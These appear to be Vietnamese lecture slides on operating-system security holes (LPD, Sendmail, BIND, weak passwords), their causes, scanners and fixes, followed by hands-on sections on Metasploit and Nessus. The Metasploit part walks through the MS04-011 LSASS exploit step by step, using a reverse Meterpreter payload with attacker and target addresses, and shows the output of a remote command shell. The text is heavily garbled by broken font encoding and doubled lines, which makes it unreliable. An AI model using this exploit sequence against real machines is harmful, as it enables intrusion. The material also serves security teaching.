Ð LPD lµ dÞch vô cho phÐp ng­êi dïng kÕt nèi ®Õn mét my in LPD lµ dÞch vô cho phÐp ng­êi dïng kÕt nèi ®Õn mét my in

côc bé tõ mét my tÝnh côc bé hoÆc ë xa theo giao thøc TCP côc bé tõ mét my tÝnh côc bé hoÆc ë xa theo giao thøc TCP

cæng 515. LPD lµ cch phæ biÕn nhÊt ®Ó sö dông dÞch vô in cæng 515. LPD lµ cch phæ biÕn nhÊt ®Ó sö dông dÞch vô in

trªn m¹ng trong cc hÖ thèng Unix vµ Linux. Tuy nhiªn nhiÒu trªn m¹ng trong cc hÖ thèng Unix vµ Linux. Tuy nhiªn nhiÒu

LPD chøa cc sai sãt lËp tr×nh dÉn ®Õn lçi trµn bé ®Öm sau khi LPD chøa cc sai sãt lËp tr×nh dÉn ®Õn lçi trµn bé ®Öm sau khi

kÎ tÊn c«ng ch¹y cc m· c ý víi ®Æc quyÒn root.kÎ tÊn c«ng ch¹y cc m· c ý víi ®Æc quyÒn root.

Göi th­ (Sendmail)Göi th­ (Sendmail) Ð Sendmail lµ ch­¬ng trSendmail lµ ch­¬ng tr××nh göi, nhËn, göi chuyÓn tiÕp phÇn lín nh göi, nhËn, göi chuyÓn tiÕp phÇn lín

cc th­ ®iÖn tö ®­îc xö lý trªn cc my tÝnh Unix vµ Linux. Víi c c th­ ®iÖn tö ®­îc xö lý trªn cc my tÝnh Unix vµ Linux. Víi

viÖc Sendmail ®­îc sö dông réng r·i trªn Internet nªn nã lµ môc viÖc Sendmail ®­îc sö dông réng r·i trªn Internet nªn nã lµ môc

tiªu cho nhiÒu kÎ tÊn c«ng trong nhiÒu ntiªu cho nhiÒu kÎ tÊn c«ng trong nhiÒu n¨m qua.m qua.

Ð C c rñi ro gÆp phC c rñi ro gÆp ph¶¶i ®èi víi Sendmail th­êng lµ hai d¹ng chÝnh: i ®èi víi Sendmail th­êng lµ hai d¹ng chÝnh:

sù leo thang ®Æc quyÒn g©y ra do trµn bé ®Öm vµ viÖc cÊu sù leo thang ®Æc quyÒn g©y ra do trµn bé ®Öm vµ viÖc cÊu

hh××nh kh«ng thÝch hîp cho phÐp my tÝnh cña b¹n lµ mét ca nh kh«ng thÝch hîp cho phÐp my tÝnh cña b¹n lµ mét ca

(relay) cho cc th­ ®iÖn tö tõ cc my kh c(relay) cho cc th­ ®iÖn tö tõ cc my kh c

BIND/DNSBIND/DNS Ð C c gãi Berkeley Internet Name Domain (BIND) lµ sù thùc thi cña C c gãi Berkeley Internet Name Domain (BIND) lµ sù thùc thi cña

Domain Name Service (DNS) ®­îc sö dông réng r·i nhÊt - hÖ thèng Domain Name Service (DNS) ®­îc sö dông réng r·i nhÊt - hÖ thèng cho phÐp x c ®Þnh vÞ trÝ cña server trªn Internet (hoÆc m¹ng côc cho phÐp x c ®Þnh vÞ trÝ cña server trªn Internet (hoÆc m¹ng côc bé) b»ng cch sö dông tªn (vÝ dô www.yahoo.com) mµ kh«ng cÇn bé) b»ng cch sö dông tªn (vÝ dô www.yahoo.com) mµ kh«ng cÇn phph¶¶i biÕt râ ®Þa chØ IP cña chóng. Sù cã mÆt ë kh¾p mäi n¬i i biÕt râ ®Þa chØ IP cña chóng. Sù cã mÆt ë kh¾p mäi n¬i cña BIND ®· lµm cho nã th­êng xuyªn lµ ®Ých cña cc cuéc tÊn cña BIND ®· lµm cho nã th­êng xuyªn lµ ®Ých cña cc cuéc tÊn c«ng. Trong khi cc nhµ ph t triÓn BIND ®· cã lÞch sö söa cc c«ng. Trong khi cc nhµ ph t triÓn BIND ®· cã lÞch sö söa cc ®iÓm yÕu rÊt nhanh th®iÓm yÕu rÊt nhanh th×× mét sè l­îng bÊt th­êng ®· lçi thêi hoÆc mét sè l­îng bÊt th­êng ®· lçi thêi hoÆc cc server ®­îc cÊu hcc server ®­îc cÊu h××nh sai vÉn cßn vµ ®ang ph« bµy ra cho cc nh sai vÉn cßn vµ ®ang ph« bµy ra cho cc cuéc tÊn c«ng.cuéc tÊn c«ng.

Ð Cã mét sè nh©n tè ®ãng gãp vµo tCã mét sè nh©n tè ®ãng gãp vµo t××nh tr¹ng nµy. Nh©n tè chñ yÕu nh tr¹ng nµy. Nh©n tè chñ yÕu thuéc vÒ nhthuéc vÒ nh÷÷ng ng­êi qung ng­êi qu¶¶n trÞ-nhn trÞ-nh÷÷ng ng­êi ®· kh«ng biÕt cc ng ng­êi ®· kh«ng biÕt cc n©ng cÊp an toµn, cc hÖ thèng ch¹y BIND deamon (®­îc gäi lµ n©ng cÊp an toµn, cc hÖ thèng ch¹y BIND deamon (®­îc gäi lµ ÒnamedÓ) kh«ng cÇn thiÕt vµ cc file cÊu hÒnamedÓ) kh«ng cÇn thiÕt vµ cc file cÊu h××nh sai. Nhnh sai. Nh÷÷ng ®iÒu ng ®iÒu nµy cã thÓ mang ®Õn viÖc tõ chèi dÞch vô, trµn bé ®Öm hoÆc nµy cã thÓ mang ®Õn viÖc tõ chèi dÞch vô, trµn bé ®Öm hoÆc huû ho¹i DNS cache. huû ho¹i DNS cache. §§iÓm yÕu cña BIND ®­îc ph t hiÖn ra gÇn iÓm yÕu cña BIND ®­îc ph t hiÖn ra gÇn ®©y nhÊt lµ tõ chèi dÞch vô. Trong tr­êng hîp nµy kÎ tÊn c«ng cã ®©y nhÊt lµ tõ chèi dÞch vô. Trong tr­êng hîp nµy kÎ tÊn c«ng cã thÓ göi cc gãi DNS riªng b¾t buéc kiÓm tra tÝnh vthÓ göi cc gãi DNS riªng b¾t buéc kiÓm tra tÝnh v÷÷ng ch¾c bªn ng ch¾c bªn trong, chç dÔ bÞ tÊn c«ng vµ sÏ lµm t¾t BIND deamon. Mét kiÓu trong, chç dÔ bÞ tÊn c«ng vµ sÏ lµm t¾t BIND deamon. Mét kiÓu kh c lµ tÊn c«ng trµn bé ®Öm trong ®ã kÎ tÊn c«ng tËn dông sù kh c lµ tÊn c«ng trµn bé ®Öm trong ®ã kÎ tÊn c«ng tËn dông sù thùc thi yÕu cña cc th­ viÖn thiÕt bÞ githùc thi yÕu cña cc th­ viÖn thiÕt bÞ gi¶¶i DNS. B»ng cch göi cc i DNS. B»ng cch göi cc ®¸p øng DNS ¸c ý kÎ tÊn c«ng cã thÓ th®¸p øng DNS ¸c ý kÎ tÊn c«ng cã thÓ th¨m dß ®iÓm yÕu nµy vµ m dß ®iÓm yÕu nµy vµ thùc thi c c m· tuú ý hoÆc thËm chÝ g©y ra tõ chèi dich vôthùc thi c c m· tuú ý hoÆc thËm chÝ g©y ra tõ chèi dich vô

Sù x c thùc Unix nãi chung- C c tµi khoSù x c thùc Unix nãi chung- C c tµi kho¶¶n kh«ng mËt n kh«ng mËt khÈu hoÆc mËt khÈu yÕu (General Windows khÈu hoÆc mËt khÈu yÕu (General Windows Authentication -- Accounts with No Passwords or Weak Authentication -- Accounts with No Passwords or Weak

Passwords)Passwords)

Ч§èi víi hÖ ®iÒu hµnh Unix còng cã ®iÓm yÕu trong èi víi hÖ ®iÒu hµnh Unix còng cã ®iÓm yÕu trong

viÖc x c thùc nãi chung vµ cc tµi khoviÖc x c thùc nãi chung vµ cc tµi kho¶¶n kh«ng mËt n kh«ng mËt

khÈu hoÆc mËt khÈu yÕu gièng nh­ ®èi víi hÖ ®iÒu khÈu hoÆc mËt khÈu yÕu gièng nh­ ®èi víi hÖ ®iÒu

hµnh Microsoft Windows ®· trhµnh Microsoft Windows ®· tr××nh bµy ë trªnnh bµy ë trªn

III. Nguyªn nh©n xuÊt hiÖn lç hæng III. Nguyªn nh©n xuÊt hiÖn lç hæng b¶o mËtb¶o mËt

1. C c lç hæng tõ hÖ ®iÒu hµnh vµ cc øng dông1. C c lç hæng tõ hÖ ®iÒu hµnh vµ cc øng dông

C c vÊn ®Ò vÒ t©m lýC c vÊn ®Ò vÒ t©m lý

Ð Khi viÕt mét ch­¬ng tr×nh phÇn mÒm, ng­êi x©y dùng ch­¬ng Khi viÕt mét ch­¬ng tr×nh phÇn mÒm, ng­êi x©y dùng ch­¬ng

tr×nh ph¶i ®Æt ra tÊt c¶ cc kh¶ n ng (thùc hiÖn ®­îc vµ kh«ng tr×nh ph¶i ®Æt ra tÊt c¶ cc kh¶ n ng (thùc hiÖn ®­îc vµ kh«ng

thùc hiÖn ®­îc) ®Ó cã ph­¬ng h­íng kh¾c phôc lçi vµ th«ng bo thùc hiÖn ®­îc) ®Ó cã ph­¬ng h­íng kh¾c phôc lçi vµ th«ng bo

lçilçi

C c lç hæng sinh ra do thay ®æi vai trß (change of role C c lç hæng sinh ra do thay ®æi vai trß (change of role

hole).hole).

Ð RÊt nhiÒu xuÊt ph t tõ viÖc ch¹y cc ch­¬ng tr×nh trong cc m«i RÊt nhiÒu xuÊt ph t tõ viÖc ch¹y cc ch­¬ng tr×nh trong cc m«i

tr­êng kh c nhau.tr­êng kh c nhau.

C c lç hæng trµn bé ®Öm: Trµn bé ®Öm xuÊt hiÖn C c lç hæng trµn bé ®Öm: Trµn bé ®Öm xuÊt hiÖn

trong mét sè tr­êng hîp:trong mét sè tr­êng hîp:

Ð Khi ®äc d÷ liÖu trùc tiÕp vµo vïng ®ÖmKhi ®äc d÷ liÖu trùc tiÕp vµo vïng ®Öm

Ð Khi copy d÷ liÖu tõ vïng ®Öm lín sang vïng ®Öm nhá h¬nKhi copy d÷ liÖu tõ vïng ®Öm lín sang vïng ®Öm nhá h¬n

Ð Khi thùc hiÖn xö lý d÷ liÖu kh c trªn vïng ®Öm cña x©u.Khi thùc hiÖn xö lý d÷ liÖu kh c trªn vïng ®Öm cña x©u.

Sù uû quyÒn nhÇm lÉnSù uû quyÒn nhÇm lÉn

Ð NhiÒu khi sù thay ®æi tªn file sÏ lµm thay ®æi kiÓu cña file dÉn NhiÒu khi sù thay ®æi tªn file sÏ lµm thay ®æi kiÓu cña file dÉn

®Õn viÖc thay ®æi cc ®Æc quyÒn trªn cc file ®ã.®Õn viÖc thay ®æi cc ®Æc quyÒn trªn cc file ®ã.

Lçi më hoÆc ®ãng (fail Ðopen or - closed):Lçi më hoÆc ®ãng (fail Ðopen or - closed): PhÇn lín cc PhÇn lín cc

hÖ thèng nh¹y chÖ thèng nh¹y c¶¶m vÒ an toµn kh«ng thùc hiÖn ®óng m vÒ an toµn kh«ng thùc hiÖn ®óng

trong mét sè tr­êng hîp. Chóng th­êng gÆp lçi trong 2 tr­trong mét sè tr­êng hîp. Chóng th­êng gÆp lçi trong 2 tr­

êng hîp sau:êng hîp sau:

Ð Cho phÐp truy cËp trong khi kh«ng cÇn cho phÐp truy nhËp. Cho phÐp truy cËp trong khi kh«ng cÇn cho phÐp truy nhËp.

§§iÒu nµy ®­îc gäi lµ lçi më (fail-open)iÒu nµy ®­îc gäi lµ lçi më (fail-open)

Ð Tõ chèi truy cËp trong khi kh«ng cÇn tõ chèi truy nhËp. Tõ chèi truy cËp trong khi kh«ng cÇn tõ chèi truy nhËp. §§iÒu iÒu

nµy ®­îc gäi lµ lçi ®ãng (fail-closed)nµy ®­îc gäi lµ lçi ®ãng (fail-closed)

ThiÕu tµi nguyªn (Resource starvation)ThiÕu tµi nguyªn (Resource starvation)

Tin t­ëng nhTin t­ëng nh÷÷ng nguån kh«ng ®¸ng tin cËy (Trusting ng nguån kh«ng ®¸ng tin cËy (Trusting

untrustworthy channels)untrustworthy channels)

Ranh giíi an toµn lín (Big interfaces)Ranh giíi an toµn lín (Big interfaces)

Ýt møc an toµnÝt møc an toµn

2. VÊn ®Ò ®èi víi ng­êi sö dông2. VÊn ®Ò ®èi víi ng­êi sö dông

Ngoµi nguyªn nh©n do hÖ ®iÒu hµnh vµ øng dông chøa Ngoµi nguyªn nh©n do hÖ ®iÒu hµnh vµ øng dông chøa

cc lçi g©y ra cc lç hæng bcc lçi g©y ra cc lç hæng b¶¶o mËt nh­ ®· ®Ò cËp ë trªn, o mËt nh­ ®· ®Ò cËp ë trªn,

cc lçi hæng bcc lçi hæng b¶¶o mËt cßn xuÊt hiÖn do cc nguyªn nh©n o mËt cßn xuÊt hiÖn do cc nguyªn nh©n

sausau::

M¹ng vµ my chñ bÞ cÊu hM¹ng vµ my chñ bÞ cÊu h××nh sainh sai

Nhµ cung cÊp thiÕu tr ch nhiÖmNhµ cung cÊp thiÕu tr ch nhiÖm

ThiÕu nhThiÕu nh÷÷ng c nh©n cã trng c nh©n cã tr××nh ®énh ®é

IV. Ph t hiÖn lç hæng b¶o mËtIV. Ph t hiÖn lç hæng b¶o mËt

§Ó ph t hiÖn vµ t×m ra cc lç hæng b¶o mËt, ng­§Ó ph t hiÖn vµ t×m ra cc lç hæng b¶o mËt, ng­êi ta sö dông cc ch­¬ng tr×nh t×m kiÕm vµ ph t êi ta sö dông cc ch­¬ng tr×nh t×m kiÕm vµ ph t hiÖn cc lç hæng b¶o mËt, vÝ dô:hiÖn cc lç hæng b¶o mËt, vÝ dô:ÐNessus (Linux)Nessus (Linux)ÐSnort (Linux)Snort (Linux)ÐHFNETCHK (Windows)HFNETCHK (Windows)ÐInforsec scanner (Windows)Inforsec scanner (Windows)ÐWindows UpdateWindows Update

V. C ch kh¾c phôc cc lç hængV. C ch kh¾c phôc cc lç hæng

N©ng cÊp hÖ ®iÒu hµnhN©ng cÊp hÖ ®iÒu hµnh

Sö dông phÇn mÒm diÖt virusSö dông phÇn mÒm diÖt virus

Ngõng chia sÎ fileNgõng chia sÎ file

V« hiÖu ho cc Script Hosting.V« hiÖu ho cc Script Hosting.

Sö dông Firewall, cc ch­¬ng tr×nh ph t hiÖn vµ Sö dông Firewall, cc ch­¬ng tr×nh ph t hiÖn vµ

chèng x©m nhËp tr i phÐpchèng x©m nhËp tr i phÐp

Sö dông miÕng v (patches)Sö dông miÕng v (patches)

PhÇn II: Thùc hµnh mét sè phÇn PhÇn II: Thùc hµnh mét sè phÇn mÒm quÐt lç hængmÒm quÐt lç hæng

Mét sè ch­¬ng tr×nh quÐt lç hængMét sè ch­¬ng tr×nh quÐt lç hængÐWindows UpdateWindows UpdateÐSecurity Holes ScannerSecurity Holes ScannerÐInfosec ScannerInfosec ScannerÐ nessusnessus

Thùc hµnh khai th c vµo lç hængThùc hµnh khai th c vµo lç hængÐMetasploitMetasploit

II. PhÇn mÒm MetasploitII. PhÇn mÒm Metasploit

Giíi thiÖuGiíi thiÖu Cµi ®ÆtCµi ®Æt Có ph pCó ph p Mét sè tuú chänMét sè tuú chän C c vÝ dôC c vÝ dô

11. Giíi thiÖu. Giíi thiÖu

Metasploit Framework lµ mét m«i tr­êng Metasploit Framework lµ mét m«i tr­êng dïng ®Ó kiÓm tra, tÊn c«ng vµ khai th c dïng ®Ó kiÓm tra, tÊn c«ng vµ khai th c lçi cña cc dÞch vô. Metasploit cã thÓ ch¹y lçi cña cc dÞch vô. Metasploit cã thÓ ch¹y trªn hÇu hÕt cc hÖ ®iÒu hµnh Linux, trªn hÇu hÕt cc hÖ ®iÒu hµnh Linux, windows. Ta cã thÓ download ch­¬ng windows. Ta cã thÓ download ch­¬ng tr×nh t¹i tr×nh t¹i www.metasploit.comwww.metasploit.com

2. Cµi ®Æt2. Cµi ®Æt

Truy nhËp vµo th­ môc chøa bé cµi cña Truy nhËp vµo th­ môc chøa bé cµi cña Metasploit, ch¹y file Framework-2.4.exeMetasploit, ch¹y file Framework-2.4.exe

Theo cc chØ dÉn trªn mµn h×nhTheo cc chØ dÉn trªn mµn h×nh

3. Sö dông metasploit3. Sö dông metasploit Metasploit cã thÓ ch¹y trªn 2 chÕ ®é: ChÕ ®é dßng Metasploit cã thÓ ch¹y trªn 2 chÕ ®é: ChÕ ®é dßng

lÖnh (Console) vµ chÕ ®é giao diÖn web (Web lÖnh (Console) vµ chÕ ®é giao diÖn web (Web interface)interface)

C ch thùc hiÖn:C ch thùc hiÖn: Start Start Programs Programs Metasploit Framework Metasploit Framework

MFSConsoleMFSConsole Thùc hiÖn cc lÖnh cña metasploit:Thùc hiÖn cc lÖnh cña metasploit:

a. Chän module exploita. Chän module exploit

Lùa chän ch­¬ng tr×nh, dÞch vô lçi mµ Lùa chän ch­¬ng tr×nh, dÞch vô lçi mµ metasploit cã thÓ hç trî ®Ó khai th cmetasploit cã thÓ hç trî ®Ó khai th c

s how explo its s how explo its : xem các module exploit mà : xem các module exploit mà framework có h tr ỗ ợframework có h tr ỗ ợ

_us e exploit name _us e exploit name : ch n module exploit ọ: ch n module exploit ọ

_info exploit name _info exploit name : xem thông tin v module ề: xem thông tin v module ềexploit exploit

Ta nên cập nhật thường xuyên các lỗi dịch vụ Ta nên cập nhật thường xuyên các lỗi dịch vụ trêntrên www.metasploit.comwww.metasploit.com

b. CÊu h×nh cho module exploit b. CÊu h×nh cho module exploit ®· chän®· chän

show options:show options: Xác định những options nào cần Xác định những options nào cần cấu hình cấu hình

set set :: cấu hình cho những option của module đó cấu hình cho những option của module đó

c. X¸c nhËn l¹i nh÷ng options c. X¸c nhËn l¹i nh÷ng options võa cÊu h×nhvõa cÊu h×nh

checkcheck:: kiểm tra xem những option đã được set kiểm tra xem những option đã được set chính xác chưa. chính xác chưa.

d. Lùa chän targetd. Lùa chän target Lùa chän hÖ ®iÒu hµnh nµo ®Ó thùc hiÖnLùa chän hÖ ®iÒu hµnh nµo ®Ó thùc hiÖn

show targetsshow targets:: những target được cung cấp bởi module đó những target được cung cấp bởi module đó

setset:: xác định target nào xác định target nào

vd: vd: mfs> use windows_ssl_pctmfs> use windows_ssl_pct

show targetsshow targets

exploit sẽ liệt kê ra những target như: winxp, winxp SP1, exploit sẽ liệt kê ra những target như: winxp, winxp SP1, win2000, win2000 SP1win2000, win2000 SP1

e. Lùa chän payload ®Ó thùc e. Lùa chän payload ®Ó thùc hiÖnhiÖn

payload là đoạn code mà sẽ chạy trên hệ thống remote payload là đoạn code mà sẽ chạy trên hệ thống remote

machine machine

show payloadsshow payloads:: liệt kê ra những payload của module exploit hiện tại liệt kê ra những payload của module exploit hiện tại

info payload_nameinfo payload_name:: xem thông tin chi tiết về payload đó xem thông tin chi tiết về payload đó

set PAYLOAD payload_nameset PAYLOAD payload_name:: xác định payload module name. xác định payload module name.

f. Thùc thi exploitf. Thùc thi exploit

exploitexploit:: lệnh dùng để thực thi payload code. Payload sau đó sẽ lệnh dùng để thực thi payload code. Payload sau đó sẽ

cung cấp cho bạn những thông tin về hệ thống được khai tháccung cấp cho bạn những thông tin về hệ thống được khai thác

VÝ dôVÝ dô Máy localhost có địa chỉ 192.168.1.1 sẽ tấn công máy remote Máy localhost có địa chỉ 192.168.1.1 sẽ tấn công máy remote

có địa chỉ 192.168.1.2 thông qua lỗi Lsass_ms04_011. Đây là có địa chỉ 192.168.1.2 thông qua lỗi Lsass_ms04_011. Đây là lỗi tràn stack trong dịch vụ LSA( Local Security lỗi tràn stack trong dịch vụ LSA( Local Security Authority).Lsass.exe là một process của hệ thống Microsoft Authority).Lsass.exe là một process của hệ thống Microsoft Windows, chịu trách nhiệm về chứng thực local security, quản Windows, chịu trách nhiệm về chứng thực local security, quản lý Active Directory và các chính sách login. Lsass kiểm sóat lý Active Directory và các chính sách login. Lsass kiểm sóat việc chứng thực của cả client và server.việc chứng thực của cả client và server.

Msf>use Lsass_ms04_011 Msf>use Lsass_ms04_011 Msf>set PAYLOAD win32_reverse_meterpreter Msf>set PAYLOAD win32_reverse_meterpreter Msf>set RHOST 192.168.1.2 Msf>set RHOST 192.168.1.2 Msf>set LHOST 192.168.1.1 Msf>set LHOST 192.168.1.1 Msf>exploit Msf>exploit Meterpreter> help Meterpreter> help Meterpreter>use -m ProcessMeterpreter>use -m Process //add thêm tập lệnh của process //add thêm tập lệnh của process Meterpreter>helpMeterpreter>help // xem các lệnh meterpreter hỗ trợ // xem các lệnh meterpreter hỗ trợ Meterpreter>psMeterpreter>ps // list các process mà remote // list các process mà remote machine đang chạy machine đang chạy Meterpreter>killMeterpreter>kill // tắt các process mà remote // tắt các process mà remote machine đang chạymachine đang chạy

>Meterpreter>Meterpreter execute -f cmd Ðc execute -f cmd Ðc// t n công s d ng comandline cmd ấ ử ụ// t n công s d ng comandline cmd ấ ử ục a remote machine ủc a remote machine ủ

execute: success, process id is 3516. execute: success, process id is 3516.

execute: allocated channel 1 for new process. execute: allocated channel 1 for new process.

>meterpreter>meterpreter interact 1 interact 1

interact: Switching to interactive console on 1... interact: Switching to interactive console on 1...

interact: Started interactive channel 1. interact: Started interactive channel 1.

Microsoft Windows XP [Version 5.1.2600] Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp. (C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS>echo Meterpreter interactive channel in action C:\WINDOWS>echo Meterpreter interactive channel in action echo Meterpreter interactive channel in action echo Meterpreter interactive channel in action

Meterpreter interactive channel in action Meterpreter interactive channel in action

:\ >C WINDOWS:\ >C WINDOWS ipconfig ipconfig

Caught Ctrl-C, close interactive session? [y/N] y Caught Ctrl-C, close interactive session? [y/N] y

>meterpreter>meterpreter

PhÇn mÒm quÐt lç hæng b¶o PhÇn mÒm quÐt lç hæng b¶o mËt:mËt:

1. Nes s us1. Nes s us

1.1. ×CÊu tróc ch­¬ng tr nh1.1. ×CÊu tróc ch­¬ng tr nh

Nessus gåm hai phÇn: Nessus gåm hai phÇn: nes s us nes s us client vµ client vµ nes s usnes s us server server ( )nes s s us d( )nes s s us d . PhÇn server . PhÇn server b¾t buéc ph¶i cµi ®Æt vµ thùc thi trªn mét b¾t buéc ph¶i cµi ®Æt vµ thùc thi trªn mét hÖ thèng Linux, cßn phÇn client cã thÓ hÖ thèng Linux, cßn phÇn client cã thÓ ch¹y trªn mét my Linux hoÆc Windows.ch¹y trªn mét my Linux hoÆc Windows.

1.2. Cµi ®Æt ch­¬ng tr×nh1.2. Cµi ®Æt ch­¬ng tr×nh §Ó cµi ®Æt Nessus trªn mét hÖ thèng my tùa §Ó cµi ®Æt Nessus trªn mét hÖ thèng my tùa

Unix chóng ta cÇn cã bèn file sau:Unix chóng ta cÇn cã bèn file sau: - - - . . . nes s us libraries x x tar gz- - - . . . nes s us libraries x x tar gz - - . . . libnas l x x tar gz- - . . . libnas l x x tar gz - - . . . . nes s us core x x tar gz- - . . . . nes s us core x x tar gz - . . . . nes s us plugins x x tar gz- . . . . nes s us plugins x x tar gz Tr­íc hÕt cÇn gi¶i nÐn cc file trªn ®Ó ®­îc cc Tr­íc hÕt cÇn gi¶i nÐn cc file trªn ®Ó ®­îc cc

th­ môc t­¬ng øng, sau ®ã tiÕn hµnh cµi ®Æt th­ môc t­¬ng øng, sau ®ã tiÕn hµnh cµi ®Æt theo thø tù sau:theo thø tù sau:

*Cµi ®Æt *Cµi ®Æt - nes s us libraries- nes s us libraries - ChuyÓn vµo th­ môc - ChuyÓn vµo th­ môc - nes s us libraries- nes s us libraries -cd nes s us libraries -cd nes s us libraries - - Ch¹yCh¹y configure configure ./configure./configure - - Thùc thi Thùc thi make make vµ vµ make ins tall make ins tall makemake make ins tall make ins tall

* Cµi ®Æt * Cµi ®Æt :libnas l:libnas l T­¬ng tù nh­ cµi ®Æt T­¬ng tù nh­ cµi ®Æt - nes s us libraries- nes s us libraries

cd libnas l cd libnas l ./configure./configure makemake make ins tall make ins tall * Sau ®ã cµi ®Æt * Sau ®ã cµi ®Æt - -nes s us core nes s us- -nes s us core nes s us

pluginsplugins theo tr×nh tù nh­ trªn theo tr×nh tù nh­ trªn

: Chó ý : Chó ý NÕu cµi ®Æt trªn hÖ thèng Linux th× trong file NÕu cµi ®Æt trªn hÖ thèng Linux th× trong file //

/ . .etc ld s o conf/ . .etc ld s o conf cÇn cã thªm cÇn cã thªm / / /us r local lib/ / /us r local lib, sau , sau ®ã t¹i dßng lÖnh gâ ®ã t¹i dßng lÖnh gâ .ldconfig.ldconfig

NÕu øng dông client kh«ng muèn sö dông ë NÕu øng dông client kh«ng muèn sö dông ë chÕ ®é GTK, ta cã thÓ sö dông ë chÕ ®é dßng chÕ ®é GTK, ta cã thÓ sö dông ë chÕ ®é dßng lÖnh b»ng cch thªm tuú chän --lÖnh b»ng cch thªm tuú chän -- -dis able gtk-dis able gtk khi khi x©y dùng x©y dùng -nes s us core-nes s us core nh­ sau: nh­ sau:

- ; ./ -- - ; cd nes s us core configure dis able gtk - ; ./ -- - ; cd nes s us core configure dis able gtk make && make ins tall make && make ins tall

1.3. × CÊu h nh vµ ch¹y thö1.3. × CÊu h nh vµ ch¹y thö Sau khi ®· tiÕn h×nh cµi ®Æt nh­ trªn, chóng Sau khi ®· tiÕn h×nh cµi ®Æt nh­ trªn, chóng

ta tiÕn hµnh cÊu h×nh ta tiÕn hµnh cÊu h×nh nes s us dnes s us d vµ vµ nes s usnes s us client nh­ sau:client nh­ sau:

* CÊu h×nh * CÊu h×nh ( ):nes s us s erver nes s us d ( ):nes s us s erver nes s us d - T¹o tµi kho¶n - T¹o tµi kho¶n nes s us dnes s us d: TiÖn Ých : TiÖn Ých -nes s us-nes s us

addus eraddus er cho phÐp t¹o mét tµi kho¶n míi. cho phÐp t¹o mét tµi kho¶n míi. # -nes s us addus er# -nes s us addus er Addition of a new nes s us d us er Addition of a new nes s us d us er ------------------------------------------------------------ : Login renaud : Login renaud ( / ) [ ] : Authentication pas s cert pas s pas s ( / ) [ ] : Authentication pas s cert pas s pas s : Pas s word s ecret : Pas s word s ecret

- CÊu h×nh nessus daemon: Trong file - CÊu h×nh nessus daemon: Trong file /usr/local/etc/nessus/nessusd.conf ta cã /usr/local/etc/nessus/nessusd.conf ta cã thÓ thiÕt lËp mét sè tuú chän cho thÓ thiÕt lËp mét sè tuú chän cho nessusd . Th«ng th­êng ë ®ã chóng ta nessusd . Th«ng th­êng ë ®ã chóng ta chØ râ cc tµi nguyªn mµ ta muèn chØ râ cc tµi nguyªn mµ ta muèn nessusd sö dông.nessusd sö dông.

Sau khi ®· cÊu h×nh nessusd, ta cã Sau khi ®· cÊu h×nh nessusd, ta cã thÓ khëi ®éng nessusd b»ng quyÒn root thÓ khëi ®éng nessusd b»ng quyÒn root nh­ sau:nh­ sau:

-nes s us d D -nes s us d D

* CÊu h×nh client* CÊu h×nh client PhÇn trªn chóng PhÇn trªn chóng

ta ®· cÊu h×nh ta ®· cÊu h×nh nes s us dnes s us d, b©y giê ta , b©y giê ta cã thÓ thùc hiÖn kÕt cã thÓ thùc hiÖn kÕt nèi ®Õn nã nh­ mét nèi ®Õn nã nh­ mét ng­êi dïng b×nh th­ng­êi dïng b×nh th­êngêng

- Gâ lÖnh - Gâ lÖnh nes s usnes s us tõ tõ dÊu nh¾c dßng lÖnhdÊu nh¾c dßng lÖnh

Sau khi ®· thiÕt lËp xong cc tuú chän trªn chóng ta tiÕn hµnh quÐt * KÕt qua thùc hiÖn quÐt trªn my 192.168.1.12 ®­îc cho trong bang sau:

1

Hosts which where alive and responding during test

Scan Details

This report gives details on hosts that were tested and issues that were found. Please follow the recommended steps and procedures to eradicate these threats.

Nessus Scan Report

2. PhÇn mÒm Security Holes ScannerSecurity Holes Scanner